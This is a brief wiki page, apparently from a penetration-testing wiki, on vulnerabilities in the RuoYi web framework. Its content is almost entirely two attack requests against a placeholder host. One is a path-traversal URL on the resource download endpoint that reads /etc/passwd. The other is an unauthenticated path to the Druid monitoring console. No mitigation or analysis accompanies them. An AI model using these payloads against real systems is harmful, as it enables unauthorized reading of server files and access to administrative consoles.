若依任意文件讀取&未授權訪問漏洞

From PwnWiki

Revision as of 10:14, 22 April 2021 by Pwnwiki (talk | contribs) (Created page with "==任意文件讀取== <pre> https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd </pre> ==未授權訪問== <pre> http://xxx.xxx.xxx.xxx...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

任意文件讀取

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

未授權訪問

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

Retrieved from "https://pwnwiki.com/index.php?title=若依_任意文件讀取%26未授權訪問漏洞&oldid=1859"